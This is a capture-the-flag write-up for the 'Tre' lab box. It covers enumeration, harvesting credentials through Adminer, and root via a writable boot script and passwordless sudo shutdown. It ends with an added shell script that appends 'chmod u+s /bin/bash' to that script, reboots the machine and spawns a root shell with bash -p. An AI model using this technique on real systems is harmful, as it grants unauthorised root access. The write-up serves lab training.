Tre - Proving Grounds Play
Enumeration
Nmap
The initial Nmap scan revealed that the SSH and HTTP ports were open.
Dirbuster
I applied directory brute forcing to the web application, which revealed some endpoints.
Then I applied additional brute forcing to the mantisbt directory, which revealed a config endpoint.
Visiting the config endpoint revealed a file named ‘a.txt’ that contained a database username and password.
Exploitation
Adminer
I knew from the first directory brute force that the Adminer application was available. I logged in to it using the database credentials I had found, then ran an SQL query that revealed the users.
User Flag
Then, using the revealed credentials, I logged in as that user and got the user flag.
Privilege Escalation
sudo -l
The sudoers file revealed that I could run shutdown as root without a password.
Linpeas
Linpeas also revealed that the ‘check-system’ file was writable by me.
Analyzing check-system
Moreover, checking with ‘ps -ef’ showed that the ‘check-system’ process has a parent PID (PPID) of 1 and that its start time equals the machine’s boot time. This means check-system is started by init right after boot, not by a logged-in user.
Alternatively, we can run ‘systemctl status check-system.service’; if the unit exists, we know it is a system daemon managed by systemd. Combined with the passwordless sudo shutdown, this gives us a writable script that runs as root and a way to trigger it.
Root
Then I simply edited the check-system file so that it sets the SUID bit on /bin/bash when it runs as root, and rebooted using the shutdown command I was allowed to run with sudo.
After the reboot I exploited the SUID bit on /bin/bash and got the root flag.
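The following is an added example, not code from the original writeup. It packages the privilege-escalation checks and the payload described above into shell functions: list the processes hanging directly off init (PPID 1) from ps -ef output, confirm the candidate boot script is writable by the current user, and build the one line that, appended to that script, sets the SUID bit on /bin/bash at the next boot. The path /usr/bin/check-system is an assumption (the writeup names the file but not its directory), and the ps -ef sample is constructed, not captured from the box.

```shell
# Added example (not part of the original writeup). Assumed path:
# /usr/bin/check-system. The ps -ef sample below is constructed.

# Constructed sample of `ps -ef` output. Columns: UID PID PPID C STIME TTY TIME CMD.
SAMPLE_PS='UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 10:02 ?        00:00:01 /sbin/init
root       412     1  0 10:02 ?        00:00:00 /bin/bash /usr/bin/check-system
www-data   611   598  0 10:03 ?        00:00:00 /usr/sbin/apache2 -k start'

# Read ps -ef output on stdin and print the full command line of every
# process whose PPID is 1, i.e. started by init/systemd rather than a shell.
init_children() {
    awk 'NR > 1 && $3 == 1 {
        for (i = 8; i <= NF; i++) printf "%s%s", $i, (i < NF ? " " : "\n")
    }'
}

# Succeed only if the file exists and the invoking user may write to it
# (the same fact linpeas reported for check-system).
writable_by_me() {
    [ -f "$1" ] && [ -w "$1" ]
}

# The line to plant: executed as root at boot, it makes /bin/bash setuid-root.
suid_payload() {
    printf 'chmod u+s /bin/bash\n'
}

# Append the payload to the writable boot script given as $1.
plant_payload() {
    writable_by_me "$1" || return 1
    suid_payload >> "$1"
}

# True once the bit is set, i.e. after the reboot has run the edited script.
bash_is_suid() {
    [ -u /bin/bash ]
}

# On the target the sequence would be (nothing below is run by this file):
#   printf '%s\n' "$SAMPLE_PS" | init_children   # spot boot-started scripts
#   plant_payload /usr/bin/check-system          # assumed path
#   sudo shutdown -r now                         # allowed without a password
#   bash_is_suid && /bin/bash -p                 # -p keeps euid 0
```

The PPID 1 test is the same check the writeup made by eye over ps -ef; on a systemd host, `systemctl status check-system.service` confirms the unit. The `-p` flag matters at the end: without it, bash drops the effective UID back to the real UID when they differ.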